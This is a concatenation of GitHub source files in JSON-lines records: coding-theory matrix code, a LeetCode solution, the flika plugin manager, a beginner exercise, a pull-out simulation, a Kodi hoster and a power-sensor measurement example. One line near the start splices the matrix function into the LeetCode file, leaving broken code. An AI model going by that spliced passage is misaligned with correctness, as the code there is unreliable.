\"Internal error, could not find systematic matrix.\"\n\n # bring identity part to end of matrix if parity-check matrix is provided\n if is_pcm:\n im = np.copy(mat[:,:m])\n mat[:,:m] = mat[:,-m:]\n mat[:,-m:] = im\n # and track column swaps\n for idx in range(m):\n column_swaps.append([idx, n-m+idx])\n\n # return integer array\n mat = mat.astype(int)\n return mat, column_swaps\n\ndef gm2pcm(gm, verify_results=True):\n r\"\"\"Generate the parity-check matrix for a given generator matrix.\n\n This function brings ``gm`` :math:`\\mathbf{G}` in its systematic form and\n uses the following relation to find the parity-check matrix\n :math:`\\mathbf{H}` in GF(2)\n\n .. math::\n\n \\mathbf{G} = [\\mathbf{I} | \\mathbf{M}]\n \\Leftrightarrow \\mathbf{H} = [\\mathbf{M} ^t | \\mathbf{I}]. \\tag{1}\n\n This follows from the fact that for an all-zero syndrome, it must hold that\n\n .. math::\n\n \\mathbf{H} \\mathbf{c}^t = \\mathbf{H} * (\\mathbf{u} * \\mathbf{G})^t =\n \\mathbf{H} * \\mathbf{G} ^t * \\mathbf{u}^t =: \\mathbf{0}\n\n where :math:`\\mathbf{c}` denotes an arbitrary codeword and\n :math:`\\mathbf{u}` the corresponding information bits.\n\n This leads to\n\n .. math::\n\n \\mathbf{G} * \\mathbf{H} ^t =: \\mathbf{0}. \\tag{2}\n\n It can be seen that (1) fulfills (2), as it holds in GF(2) that\n\n .. 
math::\n\n [\\mathbf{I} | \\mathbf{M}] * [\\mathbf{M} ^t | \\mathbf{I}]^t\n = \\mathbf{M} + \\mathbf{M} = \\mathbf{0}.\n\n Input\n -----\n gm : ndarray\n Binary generator matrix of shape `[k, n]`.\n\n verify_results: bool\n Defaults to True. If True, it is verified that the generated\n parity-check matrix is orthogonal to the generator matrix in GF(2).\n\n Output\n ------\n : ndarray\n Binary parity-check matrix of shape `[n-k, n]`.\n\n Note\n ----\n This algorithm only works if ``gm`` has full rank. Otherwise an error is\n raised.\n\n \"\"\"\n k = gm.shape[0]\n n = gm.shape[1]\n\n assert k int:\n n = len(isConnected)\n visited = [False]*n\n \n def traverse(i):\n visited[i] = True\n for j in range(n):\n if isConnected[i][j] == 1 and not visited[j]:\n traverse(j)\n\n cnt = 0\n for i in range(n):\n if not visited[i]:\n cnt += 1\n traverse(i)\n return cnt\n\n# class Solution:\n# def findCircleNum(self, isConnected: List[List[int]]) -> int:\n# n = len(isConnected)\n# # -1 : unvisited, 0 : first province, 1 : second province etc.\n# cities = [-1]*n\n \n# def traverse(i, maxGroup):\n# cities[i] = maxGroup\n# for j in range(n):\n# if isConnected[i][j] == 1 and cities[j] == -1:\n# traverse(j, maxGroup)\n\n# maxGroup = -1\n# for i in range(n):\n# if cities[i] != -1:\n# continue\n# maxGroup += 1\n# traverse(i, maxGroup)\n# return maxGroup+1\n\nif __name__ == '__main__':\n sol = Solution()\n isConnected = [[1,1,0],[1,1,0],[0,0,1]]\n print(sol.findCircleNum(isConnected))","repo_name":"LiaoU3/LeetCode","sub_path":"Problems/547_Number_of_Provinces.py","file_name":"547_Number_of_Provinces.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31711076582","text":"# -*- coding: utf-8 -*-\nfrom ..logger import logger\nlogger.debug(\"Started 'reading app/plugin_manager.py'\")\n\nfrom glob import glob\nimport os, sys, difflib, zipfile, time, shutil, traceback, subprocess\nfrom os.path import expanduser\nfrom qtpy import QtGui, QtWidgets, QtCore\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.parse import urljoin\nimport threading\nimport tempfile\nfrom xml.etree import ElementTree\nimport platform\nimport pkg_resources\n\nfrom .. import global_vars as g\nfrom ..utils.misc import load_ui\nfrom ..images import image_path\n\nplugin_list = {\n 'Beam Splitter': 'https://raw.githubusercontent.com/BrettJSettle/BeamSplitter/master/',\n 'Detect Puffs': 'https://raw.githubusercontent.com/kyleellefsen/detect_puffs/master/',\n 'Global Analysis': 'https://raw.githubusercontent.com/BrettJSettle/GlobalAnalysisPlugin/master/',\n 'Pynsight': 'http://raw.githubusercontent.com/kyleellefsen/pynsight/master/',\n 'QuantiMus': 'http://raw.githubusercontent.com/Quantimus/quantimus/master/',\n 'Rodent Tracker': 'https://raw.githubusercontent.com/kyleellefsen/rodentTracker/master/'\n}\n\nhelpHTML = '''\n
Welcome to the flika Plugin Manager\n\nUse the search bar to the left to find a specific plugin, or browse the list below it.\n\nDevelop a new plugin\n\nIf you would like to develop your own plugin for flika, follow these simple steps:\n\n1. Download flika Plugin Template and place it in your .FLIKA/plugins directory\n2. Update the info.xml file for your plugin\n3. Refer to the flika Documentation for assistance developing your plugin.\n4. Update the description.html file for your plugin\n5. Send your plugin repo to us and we'll add it to the Plugin Manager!
    \n'''\n\n\ndef get_plugin_directory():\n logger.debug('Calling app.plugin_manager.get_plugin_directory')\n local_flika_directory = os.path.join(expanduser(\"~\"), '.FLIKA')\n plugin_directory = os.path.join(expanduser(\"~\"), '.FLIKA', 'plugins' )\n if not os.path.exists(plugin_directory):\n os.makedirs(plugin_directory)\n if not os.path.isfile(os.path.join(plugin_directory, '__init__.py')):\n open(os.path.join(plugin_directory, '__init__.py'), 'a').close() # Create empty __init__.py file\n if plugin_directory not in sys.path:\n sys.path.append(plugin_directory)\n if local_flika_directory not in sys.path:\n sys.path.append(local_flika_directory)\n return plugin_directory\n\nplugin_dir = get_plugin_directory()\n\n\ndef parse(x):\n #logger.debug('Calling app.plugin_manager.parse')\n tree = ElementTree.fromstring(x)\n def step(item):\n d = {}\n if item.text and item.text.strip():\n d['#text'] = item.text.strip()\n for k, v in item.items():\n d['@%s' % k] = v\n for k in list(item):\n if k.tag not in d:\n d[k.tag] = step(k)\n elif type(d[k.tag]) == list:\n d[k.tag].append(step(k))\n else:\n d[k.tag] = [d[k.tag], step(k)]\n if len(d) == 1 and '#text' in d:\n return d['#text']\n return d\n return step(tree)\n\n\ndef str2func(plugin_name, file_location, function):\n '''\n takes plugin_name, path to object, function as arguments\n imports plugin_name.path and gets the function from that imported object\n to be run when an action is clicked\n '''\n #logger.debug(\"Started 'app.plugin_manager.str2func({}, {}, {})'\".format(plugin_name, file_location, function))\n __import__(plugin_name)\n plugin_dir = \"plugins.{}.{}\".format(plugin_name, file_location)\n levels = function.split('.')\n module = __import__(plugin_dir, fromlist=[levels[0]]).__dict__[levels[0]]\n for i in range(1, len(levels)):\n module = getattr(module, levels[i])\n #logger.debug(\"Completed 'app.plugin_manager.str2func({}, {}, {})'\".format(plugin_name, file_location, function))\n return module\n\n\ndef fake_str2func(plugin_name, file_location, function):\n def fake_fun():\n print(str(function))\n print('yay')\n return fake_fun\n\ndef build_submenu(module_name, parent_menu, layout_dict):\n #logger.debug('Calling app.plugin_manager.build_submenu')\n if len(layout_dict) == 0:\n g.alert(\"Error building submenu for the plugin '{}'. 
No items found in 'menu_layout' in the info.xml file.\".format(module_name))\n for key, value in layout_dict.items():\n if type(value) != list:\n value = [value]\n if key == 'menu':\n for v in value:\n menu = parent_menu.addMenu(v[\"@name\"])\n build_submenu(module_name, menu, v)\n elif key == 'action':\n for od in value:\n method = str2func(module_name, od['@location'], od['@function'])\n if method is not None:\n action = QtWidgets.QAction(od['#text'], parent_menu, triggered = method)\n parent_menu.addAction(action)\n\n\nclass Plugin():\n def __init__(self, name=None, info_url=None):\n self.name = name\n self.directory = None\n self.url = None\n self.author = None\n self.documentation = None\n self.version = ''\n self.latest_version = ''\n self.menu = None\n self.listWidget = QtWidgets.QListWidgetItem(self.name)\n self.installed = False\n self.description = ''\n self.dependencies = []\n self.loaded = False\n self.info_url = info_url\n if info_url:\n self.update_info()\n\n def lastModified(self):\n return os.path.getmtime(os.path.join(plugin_dir, self.directory))\n\n def fromLocal(self, path):\n #logger.debug('Calling app.plugin_manager.Plugin.fromLocal')\n with open(os.path.join(path, 'info.xml'), 'r') as f:\n text = f.read()\n info = parse(text)\n self.name = info['@name']\n self.directory = info['directory']\n self.version = info['version']\n self.latest_version = self.version\n self.author = info['author']\n with open(os.path.join(path, 'about.html'), 'r') as f:\n try:\n self.description = str(f.read())\n except FileNotFoundError:\n self.description = \"No local description file found\"\n self.url = info['url'] if 'url' in info else None\n self.documentation = info['documentation'] if 'documentation' in info else None\n if 'dependencies' in info and 'dependency' in info['dependencies']:\n deps = info['dependencies']['dependency']\n self.dependencies = [d['@name'] for d in deps] if isinstance(deps, list) else [deps['@name']]\n self.menu_layout = info.pop('menu_layout')\n self.listWidget = QtWidgets.QListWidgetItem(self.name)\n self.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n self.loaded = True\n\n def bind_menu_and_methods(self):\n if len(self.menu_layout) > 0:\n self.menu = QtWidgets.QMenu(self.name)\n build_submenu(self.directory, self.menu, self.menu_layout)\n else:\n self.menu = None\n\n\n def update_info(self):\n logger.debug('Calling app.plugin_manager.update_info')\n if self.info_url is None:\n return False\n info_url = urljoin(self.info_url, 'info.xml')\n try:\n txt = urlopen(info_url).read()\n except HTTPError as e:\n g.alert(\"Failed to update information for {}.\\n\\t{}\".format(self.name, e))\n return\n\n new_info = parse(txt)\n description_url = urljoin(self.info_url, 'about.html')\n try:\n new_info['description'] = urlopen(description_url).read().decode('utf-8')\n except HTTPError:\n new_info['description'] = \"Unable to get description for {0} from {1}\".format(self.name, description_url)\n self.menu_layout = new_info.pop('menu_layout')\n if 'date' in new_info:\n new_info['version'] = '.'.join(new_info['date'].split('/')[2:] + new_info['date'].split('/')[:2])\n new_info.pop('date')\n new_info['latest_version'] = new_info.pop('version')\n if 'dependencies' in new_info and 'dependency' in new_info['dependencies']:\n deps = new_info.pop('dependencies')['dependency']\n self.dependencies = [d['@name'] for d in deps] if isinstance(deps, list) else [deps['@name']]\n self.__dict__.update(new_info)\n self.loaded = True\n \n\nclass 
PluginManager(QtWidgets.QMainWindow):\n plugins = {}\n loadThread = None\n sigPluginLoaded = QtCore.Signal(str)\n '''\n PluginManager handles installed plugins and the online plugin database\n | show() : initializes a gui as a static variable of the class, if necessary, and displays it. Call in place of constructor\n | close() : closes the gui if it exists\n '''\n @staticmethod\n def show():\n logger.debug('Calling app.plugin_manager.PluginManager.show')\n if not hasattr(PluginManager, 'gui'):\n PluginManager.gui = PluginManager()\n PluginManager.gui.showPlugins()\n #PluginManager.load_online_plugins()\n QtWidgets.QMainWindow.show(PluginManager.gui)\n if not os.access(plugin_dir, os.W_OK):\n g.alert(\"Plugin folder write permission denied. Restart flika as administrator to enable plugin installation.\")\n\n PluginManager.gui.showHelpScreen()\n\n\n @staticmethod\n def refresh_online_plugins():\n logger.debug('Calling app.plugin_manager.PluginManager.refresh_online_plugins()')\n for p in plugin_list.keys():\n PluginManager.load_online_plugin(p)\n\n @staticmethod\n def load_online_plugin(p):\n logger.debug('Calling app.plugin_manager.PluginManager.load_online_plugin()')\n if p not in plugin_list or PluginManager.loadThread is not None and PluginManager.loadThread.is_alive():\n return\n def loadThread():\n plug = PluginManager.plugins[p]\n plug.info_url = plugin_list[p]\n plug.update_info()\n PluginManager.gui.sigPluginLoaded.emit(p)\n #PluginManager.gui.statusBar.showMessage('Plugin information loaded successfully')\n\n PluginManager.loadThread = threading.Thread(None, loadThread)\n PluginManager.gui.statusBar.showMessage('Loading plugin information for {}...'.format(p))\n PluginManager.loadThread.start()\n\n def closeEvent(self, ev):\n if self.loadThread is not None and self.loadThread.is_alive():\n self.loadThread.join(0)\n\n @staticmethod\n def close():\n if hasattr(PluginManager, 'gui'):\n QtWidgets.QMainWindow.close(PluginManager.gui)\n\n def __init__(self):\n logger.debug('Calling app.plugin_manager.PluginManager.load_online_plugin()')\n\n super(PluginManager,self).__init__()\n load_ui(\"plugin_manager.ui\", self, directory=os.path.dirname(__file__))\n try:\n self.scrollAreaWidgetContents.setContentsMargins(10, 10, 10, 10)\n except:\n pass\n #self.pluginList.itemClicked.connect(self.pluginSelected)\n self.tutorialButton.clicked.connect(lambda : QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"https://github.com/flika-org/flika_plugin_template\")))\n self.open_plugins_directory_button.clicked.connect(lambda: QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"file:///\" + os.path.expanduser('~/.FLIKA/plugins/'))))\n\n self.downloadButton.clicked.connect(self.downloadClicked)\n self.pluginList.currentItemChanged.connect(lambda new, old: self.pluginSelected(new))\n self.documentationButton.clicked.connect(self.documentationClicked)\n self.updateButton.clicked.connect(self.updateClicked)\n \n self.searchBox.textChanged.connect(self.showPlugins)\n self.searchButton.clicked.connect(lambda f: self.showPlugins(search_str=str(self.searchBox.text())))\n self.descriptionLabel.setOpenExternalLinks(True)\n \n self.refreshButton.pressed.connect(self.refresh_online_plugins)\n def updatePlugin(a):\n self.statusBar.showMessage(\"Finished loading {}\".format(a))\n if PluginManager.plugins[a].listWidget.isSelected():\n PluginManager.gui.pluginSelected(a)\n #else:\n #self.showPlugins()\n self.sigPluginLoaded.connect(updatePlugin)\n\n self.setWindowTitle('Plugin Manager')\n self.showPlugins()\n\n def 
showHelpScreen(self):\n self.pluginLabel.setText(\"\")\n self.descriptionLabel.setHtml(helpHTML)\n self.downloadButton.setVisible(False)\n self.documentationButton.setVisible(False)\n self.updateButton.setVisible(False)\n self.infoLabel.setText(\"\")\n\n def downloadClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n if self.downloadButton.text() == 'Install':\n PluginManager.downloadPlugin(plugin)\n else:\n PluginManager.removePlugin(plugin)\n\n def documentationClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n if hasattr(plugin, \"documentation\"):\n QtGui.QDesktopServices.openUrl(QtCore.QUrl(plugin.documentation))\n\n def updateClicked(self):\n p = str(self.pluginList.currentItem().text())\n plugin = self.plugins[p]\n PluginManager.removePlugin(plugin)\n PluginManager.downloadPlugin(plugin)\n\n def pluginSelected(self, item):\n from pkg_resources import parse_version\n logger.debug('Calling app.plugin_manager.PluginManager.pluginSelected()')\n if item is None:\n if self.pluginLabel.text():\n self.pluginSelected(PluginManager.plugins[self.pluginLabel.text()].listWidget)\n return\n if isinstance(item, str):\n s = item\n else:\n s = str(item.text())\n plugin = self.plugins[s]\n self.pluginLabel.setText(s)\n if not plugin.loaded:\n info = \"Loading information\"\n else:\n info = 'By {}, Latest: {}'.format(plugin.author, plugin.latest_version)\n self.downloadButton.setVisible(True)\n version = parse_version(plugin.version)\n latest_version = parse_version(plugin.latest_version)\n if plugin.version and version < latest_version:\n info += \"; Update Available!\"\n\n self.updateButton.setVisible(plugin.version != '' and version < latest_version)\n self.downloadButton.setText(\"Install\" if plugin.version == '' else 'Uninstall')\n self.documentationButton.setVisible(plugin.documentation != None)\n if plugin.version == '':\n plugin.listWidget.setIcon(QtGui.QIcon())\n elif parse_version(plugin.version) < parse_version(plugin.latest_version):\n plugin.listWidget.setIcon(QtGui.QIcon(image_path('exclamation.png')))\n else:\n plugin.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n\n self.infoLabel.setText(info)\n self.descriptionLabel.setHtml(plugin.description)\n if plugin.info_url == None:\n self.load_online_plugin(plugin.name)\n\n @staticmethod\n def local_plugin_paths():\n paths = []\n for path in glob(os.path.join(plugin_dir, \"*\")):\n if os.path.isdir(path) and os.path.exists(os.path.join(path, 'info.xml')):\n paths.append(path)\n return paths\n\n def clearList(self):\n while self.pluginList.count() > 0:\n self.pluginList.takeItem(0)\n\n def showPlugins(self, search_str=None):\n from pkg_resources import parse_version\n self.clearList()\n if search_str == None or len(search_str) == 0:\n names = sorted(self.plugins.keys())\n else:\n def sort_func(name):\n name = str(name)\n return -difflib.SequenceMatcher(None, name.lower(), search_str.lower()).ratio() - int(search_str.lower() in name.lower())\n d = {name: sort_func(name) for name in self.plugins.keys() if sort_func(name) != 0}\n names = sorted(d.keys(), key=lambda a: d[a])\n for name in names:\n plug = PluginManager.plugins[name]\n if plug.version == '':\n plug.listWidget.setIcon(QtGui.QIcon())\n elif parse_version(plug.version) < parse_version(plug.latest_version):\n plug.listWidget.setIcon(QtGui.QIcon(image_path('exclamation.png')))\n else:\n plug.listWidget.setIcon(QtGui.QIcon(image_path('check.png')))\n self.pluginList.addItem(plug.listWidget)\n\n 
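    # Uninstalling deletes the plugin folder from the plugins directory; git-managed plugin folders must be removed manually.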
@staticmethod\n def removePlugin(plugin):\n PluginManager.gui.statusBar.showMessage(\"Uninstalling {}\".format(plugin.name))\n if os.path.isdir(os.path.join(plugin_dir, plugin.directory, '.git')):\n g.alert(\"This plugin's directory is managed by git. To remove, manually delete the directory\")\n return False\n try:\n shutil.rmtree(os.path.join(plugin_dir, plugin.directory), ignore_errors=True)\n plugin.version = ''\n plugin.menu = None\n plugin.listWidget.setIcon(QtGui.QIcon())\n PluginManager.gui.statusBar.showMessage('{} successfully uninstalled'.format(plugin.name))\n except Exception as e:\n g.alert(title=\"Plugin Uninstall Failed\", msg=\"Unable to remove the folder at %s\\n%s\\nDelete the folder manually to uninstall the plugin\" % (plugin.name, e), icon=QtWidgets.QMessageBox.Warning)\n\n PluginManager.gui.pluginSelected(plugin.listWidget)\n plugin.installed = False\n\n @staticmethod\n def downloadPlugin(plugin):\n PluginManager.gui.statusBar.showMessage(\"Installing plugin\")\n if isinstance(plugin, str):\n if plugin in PluginManager.plugins:\n plugin = PluginManager.plugins[plugin]\n else:\n return\n if plugin.url is None:\n return\n failed = []\n dists = [a.project_name for a in pkg_resources.working_set]\n PluginManager.gui.statusBar.showMessage(\"Installing dependencies for %s\" % plugin.name)\n for pl in plugin.dependencies:\n try:\n if pl in dists:\n continue\n a = __import__(pl)\n except ImportError:\n res = subprocess.call([sys.executable, '-m', 'pip', 'install', '{}'.format(pl), '--no-cache-dir'])\n if res != 0:\n failed.append(pl)\n if failed:\n if platform.system() == 'Windows':\n QtGui.QDesktopServices.openUrl(QtCore.QUrl(\"http://www.lfd.uci.edu/~gohlke/pythonlibs/#\"+pl))\n v = str(sys.version_info.major) + str(sys.version_info.minor)\n if platform.architecture()[0]=='64bit':\n arch = '_amd64'\n else:\n arch = '32'\n g.alert(\"\"\"Failed to install the dependency '{0}'. You must install {0} manually.\nDownload {0}-x-cp{1}-cp{1}m-win{2}.whl.\n\nOnce the wheel is downloaded, drag it into flika to install.\n\nThen try installing the plugin again.\"\"\".format(pl, v, arch))\n else:\n g.alert(\"Failed to install dependencies for {}:\\n{}\\nYou must install them on your own before installing this plugin.\".format(plugin.name, ', '.join(failed)))\n\n return\n\n if os.path.exists(os.path.join(plugin_dir, plugin.directory)):\n g.alert(\"A folder with name {} already exists in the plugins directory. Please remove it to install this plugin!\".format(plugin.directory))\n return\n\n PluginManager.gui.statusBar.showMessage('Opening %s' % plugin.url)\n try:\n data = urlopen(plugin.url).read()\n except:\n g.alert(title=\"Download Error\", msg=\"Failed to connect to %s to install the %s flika Plugin. Check your internet connection and try again, or download the plugin manually.\" % (PluginManager.gui.link, plugin.name), icon=QtWidgets.QMessageBox.Warning)\n return\n\n try:\n\n with tempfile.TemporaryFile() as tf:\n tf.write(data)\n tf.seek(0)\n with zipfile.ZipFile(tf) as z:\n folder_name = os.path.dirname(z.namelist()[0])\n z.extractall(plugin_dir)\n\n plugin = PluginManager.plugins[plugin.name]\n directory = os.path.join(plugin_dir, plugin.directory)\n os.rename(os.path.join(plugin_dir, folder_name), directory)\n except (PermissionError, Exception) as e:\n if os.path.exists(folder_name):\n shutil.rmtree(folder_name)\n if isinstance(e, PermissionError):\n g.alert(\"Unable to download plugin to {}. 
Rerun flika as administrator and download the plugin again.\".format(plugin.name), title='Permission Denied')\n            else:\n
                g.alert(\"An error occurred while installing {}.\\n\\t{}\".format(plugin.name, e), title='Plugin Install Failed')\n\n            return\n\n
        PluginManager.gui.statusBar.showMessage('Extracting %s' % plugin.name)\n        plugin.version = plugin.latest_version\n
        plugin.listWidget.setIcon(QtGui.QIcon(image_path(\"check.png\")))\n        #plugin.menu = make_plugin_menu(plugin)\n
        plugin.menu = QtWidgets.QMenu(plugin.name)\n        build_submenu(plugin.directory, plugin.menu, plugin.menu_layout)\n\n
        PluginManager.gui.statusBar.showMessage('Successfully installed {} and its dependencies'.format(plugin.name))\n
        PluginManager.gui.pluginSelected(plugin.listWidget)\n        plugin.installed = True\n\n\n
class Load_Local_Plugins_Thread(QtCore.QThread):\n    plugins_done_sig = QtCore.Signal(dict)\n    error_loading = QtCore.Signal(str)\n\n
    def __init__(self):\n        QtCore.QThread.__init__(self)\n\n
    def run(self):\n        #logger.debug(\"Started 'app.plugin_manager.load_local_plugins'\")\n        plugins = {n: Plugin(n) for n in plugin_list}\n
        installed_plugins = {}\n        for pluginPath in PluginManager.local_plugin_paths():\n            p = Plugin()\n            p.fromLocal(pluginPath)\n
            try:\n                p.bind_menu_and_methods()\n
                if p.name not in plugins.keys() or p.name not in installed_plugins.keys():\n                    p.installed = True\n
                    plugins[p.name] = p\n                    installed_plugins[p.name] = p\n                else:\n
                    g.alert('Could not load the plugin {}. There is already a plugin with the same name. Change the plugin name in the info.xml file'.format(p.name))\n
            except Exception as e:\n                msg = \"Could not load plugin {}\".format(pluginPath)\n                self.error_loading.emit(msg)\n
                #g.alert(msg)\n                logger.error(msg)\n                ex_type, ex, tb = sys.exc_info()\n                sys.excepthook(ex_type, ex, tb)\n
        self.plugins_done_sig.emit(plugins)\n        #logger.debug(\"Completed 'app.plugin_manager.load_local_plugins'\")\n\n
# from flika.app.plugin_manager import *\n\n\nlogger.debug(\"Completed 'reading app/plugin_manager.py'\")","repo_name":"flika-org/flika","sub_path":"flika/app/plugin_manager.py","file_name":"plugin_manager.py","file_ext":"py","file_size_in_byte":23503,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"}
+{"seq_id":"1823350072","text":"# Create a program where the user can enter five numerical values and add them to a list, already in the correct insertion position (without using sort()). Finally, display the sorted list on the screen.\n
list = []\nfor c in range(0, 5):\n    n = int(input('Value: '))\n    if c == 0 or n > list[-1]:\n        list.append(n)\n    else:\n        i = 0\n
        while i < len(list):\n            if n <= list[i]:\n                list.insert(i, n)\n                break\n            i += 1\n
print(list)\n","repo_name":"patriciagivort/pythonchalleg","sub_path":"ex80.py","file_name":"ex80.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
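Two asides on the exercise above: the variable name list shadows Python's built-in list type (a name such as values would be safer), and although the exercise forbids sort(), the standard library's bisect module solves exactly this sorted-insertion problem. A minimal sketch for comparison (my addition, not part of the exercise):

import bisect

values = []
for _ in range(5):
    n = int(input('Value: '))
    bisect.insort(values, n)  # insert n while keeping values sorted
print(values)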
+{"seq_id":"4490132683","text":"'''\r\nCreated on 18.06.2019\r\n\r\n@author: fseemab\r\n'''\r\nimport time\r\n\r\n
from ibvpy.fets import FETS2D4Q\r\nfrom simulator.xdomain.xdomain_fe_grid import XDomainFEGrid\r\nfrom view.window.bmcs_window import BMCSWindow\r\n\r\n
from apps.verify.bond_cum_damage.pullout_2d_model.pullout2d_model import PullOut2D\r\nfrom apps.verify.bond_cum_damage.pullout_2d_model.verify02_quasi_pullout import verify02_quasi_pullout\r\n
import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pylab as p\r\nimport traits.api as tr\r\n\r\n\r\n
def verify_normalized_pullout_force():\r\n\r\n    ds = 16\r\n    r_steel = ds / 2\r\n    L_x = ds * 5\r\n    r_concrete = 75\r\n    n_x = 2\r\n    n_y = 2\r\n    ax = p.subplot(111)\r\n\r\n
    f_list = [0]  # [0, -5, -10, -15, -20]\r\n    for f_lateral in f_list:  # [0, -100]\r\n\r\n        print('lateral confining pressure', f_lateral)\r\n\r\n
        s = verify02_quasi_pullout(f_lateral=f_lateral)\r\n        s.xd_steel.trait_set(coord_min=(0, 0),\r\n                             coord_max=(L_x, r_steel),\r\n                             shape=(n_x, 1)\r\n                             )\r\n
        s.xd_concrete.trait_set(coord_min=(0, r_steel),\r\n                                coord_max=(L_x, r_concrete),\r\n                                shape=(n_x, n_y)\r\n                                )\r\n
        s.u_max = 0.2\r\n        s.tline.step = 0.01\r\n        s.run()\r\n        print('F', np.sum(s.hist.F_t[-1, s.right_x_s.dofs]))\r\n
        w = s.get_window()\r\n        w.viz_sheet.viz2d_dict['Pw'].plot(ax, 1)\r\n\r\n
        print('P_max', np.max(s.record['Pw'].sim.hist.F_t))\r\n        print('P_end', np.sum(s.hist.F_t[-1, s.right_x_s.dofs]))\r\n\r\n
#         if False:\r\n#             s = verify02_quasi_pullout(f_lateral=f_lateral)\r\n#             s.xd_steel.trait_set(coord_min=(0, 0),\r\n#                                  coord_max=(L_x, r_steel),\r\n#                                  shape=(n_x, 1)\r\n#                                  )\r\n
#             s.xd_concrete.trait_set(coord_min=(0, r_steel),\r\n#                                     coord_max=(r_steel, r_concrete),\r\n#                                     shape=(n_x, n_y)\r\n#                                     )\r\n
#             s.u_max = 0.5\r\n#             s.tline.step = 0.05\r\n
        s.m_steel.trait_set(E=200000, nu=0.3)\r\n        s.m_concrete.trait_set(E=29800, nu=0.3)\r\n
        s.m_ifc.trait_set(E_T=12900,\r\n                          E_N=1e9,\r\n                          tau_bar=4.2,  # 4.0,\r\n                          K=0, gamma=10,  # 10,\r\n                          c=1, S=0.0025, r=1,\r\n                          m=0,\r\n                          algorithmic=False)\r\n
        s.f_lateral = f_lateral\r\n\r\n        w = s.get_window()\r\n        w.viz_sheet.viz2d_dict['Pw'].plot(ax, 1)\r\n\r\n        s.run()\r\n    p.show()\r\n\r\n\r\n
if __name__ == '__main__':\r\n    verify_normalized_pullout_force()\r\n","repo_name":"simvisage/bmcs","sub_path":"apps/verify/bond_cum_damage/pullout_2d_model/verify03_pullout2d_normalized_max_pullout.py","file_name":"verify03_pullout2d_normalized_max_pullout.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"32691896379","text":"# -*- coding: utf-8 -*-\n# vStream https://github.com/Kodi-vStream/venom-xbmc-addons\n# https://letsupload.co/plugins/mediaplayer/site/_embed.php?u=1r0c1&w=770&h=320\n
from resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.hosters.hoster import iHoster\nfrom resources.lib.parser import cParser\n\n\n
class cHoster(iHoster):\n\n    def __init__(self):\n        iHoster.__init__(self, 'letsupload', 'Letsupload')\n\n    def isDownloadable(self):\n        return 
False\n\n def _getMediaLinkForGuest(self):\n api_call = ''\n oRequest = cRequestHandler(self._url)\n sHtmlContent = oRequest.request()\n\n oParser = cParser()\n sPattern = 'file: *\"([^\"]+)\",*'\n\n aResult = oParser.parse(sHtmlContent, sPattern)\n if aResult[0] is True:\n api_call = aResult[1][0]\n\n if api_call:\n return True, api_call\n\n return False, False\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/hosters/letsupload.py","file_name":"letsupload.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"73330711146","text":"\"\"\"\n# GitHub examples repository path: Powersensors/Python/RsInstrument\n\nCreated on 2022/02\n\nAuthor: Jahns_P\nVersion Number: 1\nDate of last change: 2022/02/03\nRequires: NRX, FW 02.50.21112602 or newer , adequate sensor and signal source\n- Installed RsInstrument Python module (see the attached RsInstrument_PythonModule folder Readme.txt)\n- Installed VISA e.g. R&S Visa 5.12.x or newer\n\nDescription: Example for single triggered measurement with marker support\n\nGeneral Information:\n\nPlease always check this example script for unsuitable setting that may\ndestroy your DUT or instrument before connecting!\nThis example does not claim to be complete. All information has been\ncompiled with care. However, errors can not be ruled out.\n\"\"\"\n\nfrom RsInstrument import *\nfrom time import sleep\n\nRsInstrument.assert_minimum_version('1.53.0')\n\n#\n# Signal for the following settings is pulse modulated, 1m s PRI, 10 µs duty\n#\n\nnrp = RsInstrument('TCPIP::10.205.0.82::hislip0', True, True, \"SelectVisa='rs'\")\n'''\n(resource, True, True, \"SelectVisa='rs'\") has the following meaning:\n(VISA-resource, id_query, reset, options)\n- id_query: if True: the instrument's model name is verified against the models \nsupported by the driver and eventually throws an exception. 
\n- reset: Resets the instrument (sends the *RST command) and clears its status sub-system\n- option SelectVisa:\n
    - 'SelectVisa = 'socket' - uses no VISA implementation for socket connections - you do not need any VISA-C installation\n
    - 'SelectVisa = 'rs' - forces usage of Rohde&Schwarz Visa\n    - 'SelectVisa = 'ni' - forces usage of National Instruments Visa \n'''\n\n
sensor = nrp.query_str('SENS:CAT?')  # Request the connected sensor(s)\nprint('The following sensor is connected:', sensor)\n
print('Now performing Zeroing - please remove signal source from the sensor and confirm')\n_ = input()\nprint('...Please wait until zeroing is done...')\n
nrp.write_str_with_opc('CAL1:ZERO ONCE')  # Perform Zeroing for all connected sensors\nprint('\\nZeroing completed - please connect signal source to the sensor')\n_ = input()\n
nrp.write_str_with_opc('DISPlay:LAYout L1')  # Display contains just one window\nnrp.write_str_with_opc('CALCulate1:TYPE TRACe')  # Switch to Trace Mode\n
nrp.write_str('Sense1:TRACe:TIME .0002')  # Set displayed time range (10 times of time/div)\nnrp.write_str_with_opc('FREQ 1GHz')  # Set working frequency (important for internal correction)\n
nrp.write_str_with_opc('TRIGger1:MODE SINGle')  # Single trigger mode\nnrp.write_str('TRIGger1:CHAN1:LEV -21')  # Trigger level\n
nrp.write_str_with_opc('DISPlay1:TRACe:MARKer1:MODE MEASure')  # Show triangle on marker position\n
nrp.write_str_with_opc('DISPlay1:TRACe:MARKer1:POSition:MODE PSE')  # Peak search on for marker measurement\n
